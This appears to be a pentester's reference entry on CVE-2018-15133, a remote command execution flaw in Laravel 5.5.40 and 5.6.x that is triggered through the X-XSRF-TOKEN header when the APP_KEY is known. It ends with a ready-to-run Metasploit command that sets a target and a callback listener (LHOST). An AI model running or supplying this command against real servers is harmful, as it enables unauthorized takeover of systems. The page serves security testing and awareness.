###########
PHP Laravel
###########


*******************
5.5.40/5.6.x<5.6.30
*******************

Desc
****

| PHP Laravel Framework token Unserialize Remote Command Execution (2018-08-07)
|
| This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29.
| Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to
| an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php.
| Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY.
| Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix.
| In some cases the APP_KEY is leaked which allows for discovery and exploitation

Ref
***

| https://nvd.nist.gov/vuln/detail/CVE-2018-15133
| https://github.com/kozmic/laravel-poc-CVE-2018-15133

Exploit
*******

| https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/http/laravel_token_unserialize_exec.rb
| You need a valid APP_KEY

.. code-block:: bash

  msfconsole -x '
  use exploit/unix/http/laravel_token_unserialize_exec ;
  set APP_KEY dBLU...Fj0= ;
  set VHOST target.com ;
  set RHOSTS 1.2.3.4 ;
  set LHOST 4.3.2.1 ;
  run ;
  '
